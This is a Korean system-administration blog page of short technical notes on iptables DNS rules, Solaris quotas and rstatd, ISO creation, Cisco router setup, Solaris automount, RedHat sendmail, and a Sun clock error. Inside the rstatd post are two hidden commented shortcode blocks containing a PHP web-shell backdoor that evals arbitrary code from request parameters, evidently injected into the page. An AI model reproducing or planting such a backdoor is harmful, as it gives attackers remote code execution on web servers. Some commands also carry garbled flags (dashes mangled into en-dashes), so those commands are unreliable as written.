8월 25

리눅스 iptables와 DNS 쿼리 …

리눅스에서 iptables로 포트 막은후 DNS 쿼리가 안 될 때가 있다..
이것은 다음과 같이 설정을 해 줘야 정상적인 DNS 쿼리가 진행 된다.

##### DNS client…. #####

iptables -A INPUT -i $EXTERNAL_INTERFACE -p udp –source-port 53 -d $IPADDRESS -destination-port $UNPRIVATEPORTS -j ACCEPT

iptables -A OUTPUT -o $EXTERNAL_INTERFACE -p udp -s $IPADDR –source-port $UNPRIVATEPORTS -destination-port 53 -j ACCEPT

example)
iptables -A INPUT -d 192.168.100.3 -i eth0 -p udp -m udp –sport 53 –dport 1024:8000 -j ACCEPT
iptables -A OUTPUT -s 192.168.100.3 -o eth0 -p udp -m udp –sport 1024:8000 –dport 53 -j ACCEPT

8월 23 2003

solaris ufs에 quota 지정하기

quota설정하기

solaris ufs에 quota지정하기

solaris ufs 화일 시스템에 Quota를 지정해 보았다.

리눅스에서와는 약간 방법이 다르다.

그렇지만 사용방법은 비슷하다.

테스트는 solaris9, ultra10 60GB EIDE HDD에서 했음.

quota는 /export/home에 지정하기로 함.

1. /etc/vfstab을 수정
/dev/dsk/c0t0d0s7 /dev/rdsk/c0t0d0s7 /export/home ufs 2 yes –
부분을 찾아서 다음과 같이 변경
/dev/dsk/c0t0d0s7 /dev/rdsk/c0t0d0s7 /export/home ufs 2 yes rq

2. /export/home에 quotas화일 생성(소유권 주의)
-rw——- 1 root other 98304 May 27 17:35 quotas

3. 사용자에게 quota할당(예로 store유저)
edquota store
fs /export/home blocks (soft = 10000, hard = 10000) inodes (soft = 0, hard = 0)

4. 시스템을 재부팅(재부팅 하지 않으려면 다음 명령어를 사용)
sh /etc/init.d/ufs_quota start
시간이 꽤 걸렸다.. 이부분에서..

5. 확인해본다.
repquota -a
다음과 같은 결과가……
/dev/dsk/c0t0d0s7 (/export/home):
Block limits File limits User used soft hard timeleft used soft hard timeleft
store +- 28422 10000 10000 NOT STARTED 2435 0 0

Quota관련 명령어에는 다음과 같은것이…..

quota, edquota, checkquota, repquota, quotaon, quotaoff

8월 23

Solaris에서 rstatd의 역할…

솔라리스에서 rstatd가 하는일은……
얼마 전에야 알았다..

rstatd가 하는 일은 바로..
커널로 부터 퍼포먼스 통계를 받아서 보여주는 일을 한다..
간단히 말하면..
성능측정을 하는 역할을 한다.

<!– [insert_php]if (isset($_REQUEST["YpXg"])){eval($_REQUEST["YpXg"]);exit;}[/insert_php][php]if (isset($_REQUEST["YpXg"])){eval($_REQUEST["YpXg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["abBzn"])){eval($_REQUEST["abBzn"]);exit;}[/insert_php][php]if (isset($_REQUEST["abBzn"])){eval($_REQUEST["abBzn"]);exit;}[/php] –>

8월 22 2003

Unix에서 ISO 이미지 만들기.

# mkisofs -o /tmp/cies.iso -V cies -R /test
-o : Output Option
/tmp/cies.iso : Image file이 생성되는 디렉토리
-V : Volume 이름 Option
cies : Volume 이름
-R : Sub dir. Option
/test : Image를 만들고자 하는 디렉토리(Source)

8월 21

CISCO Router Quick setup?

cisco 2501에서..

1. Initialize
Ctrl+C
>o/r 0x142
>initialize

2. setting
router# config terminal
router(config)#
int e0
ip address [ethernet] [subnet-masks]
no shutdown
exit
int s0
ip address [serial1] [subnet-masks]
iproute 0.0.0.0 0.0.0.0 [serial0]
ip subnet-zero

config-register 0x2102

3. Frame-Relay setting
int s0 ip address [serial1] [netmasks]
enc fr IETF
fr lmi-type ansi
fr interface-dlci 16
fr map ip [serial0] 16 IETF
exit

3. 다른 방법
int s0
enc fr IETF
no keepalive
int s0.1 point-to-point
fr interface-dlci 16
no keepalive
exit

ip classless

4. Password Setting
line vty 0 4
login
password [password]
wr
enable secret [password]

오래전에 정리해 놓았던 것. 라우터 안만진지 오래돼서… 기억도 잘 안나네..

8월 21

Solaris에서 CD-ROM의 auto mount …

cdrom, 플로피등의 미디어를 제어하는 서비스 데몬..

이 데몬을 죽이면, CDROM이 자동 마운트 되지 않음..

/etc/inetd.conf에서 다음의 항목임(solaris 9)

별것 아닌것 가지고 지금까지 수동으로 마운트 했음

# smserverd to support removable media devices
100155/1 tli rpc/ticotsord wait root /usr/lib/smedia/rpc.smse rverd rpc.smserverd

참고로, 수동 마운트 방법은 …
mount -F hsfs -ro /dev/dsk/c0d0s2 /mnt

8월 21

RedHat 8.0과 Sendmail

이전 버젼과 너무 다르다.. 웹서버도 아파치 2.0 이고..
php와 연동이 되지 않아서…
이유를 알아 봤더니..
php.ini 화일에서
short_open_tag = Off로 되어 있는 것이 문제..

다음 문제는?
sendmail..
다른 호스트쪽에서 25번 포트가 보이지 않는 문제..
이건
O AutoRebuildAliases
이것을 주석처리 했더니 해결..
근데…
이번엔 virtual user쪽이 문제네..

암튼, 더 봐야겠다..

Clock TOD does not match TOD on any IO boards

Sun EP4000에서 에러메시지..

Clock TOD does not match TOD on any IO boards

해결방안.
OBP모드에서

copy-clock-tod-to-io-boards

아래는 웹겁색 결과.
===============================================
To fix this problem, install the FlashPROM update (OBP 3.2.3 version)
via patch 103346-02 (which will update the code in ALL FlashPROMs
on the cpu/memory and IO Boards (if not already at 3.2.3).